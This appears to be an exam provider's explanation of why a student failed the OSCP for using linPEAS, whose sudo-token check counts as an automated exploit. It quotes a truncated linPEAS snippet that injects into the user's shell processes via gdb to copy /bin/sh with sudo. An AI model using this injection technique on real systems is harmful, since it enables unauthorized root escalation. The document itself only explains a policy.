Earlier today a student shared with the infosec community that they failed their OSCP exam because they used a popular Linux enumeration tool called linPEAS.
linPEAS is a well-known enumeration script that searches for possible paths to escalate privileges on Linux/Unix* targets.
When reviewing their exam report, we found that a portion of the exploit chain they provided was considered by us to be an automated exploit since this automation is included in linPEAS. linPEAS utilizes a sudo token vulnerability which creates an executable binary and tests it in the background. If the executable works then the script will provide a command that the student needs to run the executable in order to escalate your privileges to obtain a root shell.
Here is a snippet from the linPEAS source code that is used to execute the sudo token vulnerability:
if [ ! “$SUPERFAST” ] && [ “$ptrace_scope” ] && [ “$ptrace_scope” -eq 0 ] && [ “$is_gdb” ]; then
echo “Checking for sudo tokens in other shells owned by current user”
for pid in $(pgrep ‘^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$’ -u “$(id -u)” 2>/dev/null | grep -v “^$$$”); do
echo “Injecting process $pid -> “$(cat “/proc/$pid/comm” 2>/dev/null)
echo ‘call system(“echo | sudo -S cp /bin/sh /tmp/shrndom >/dev/null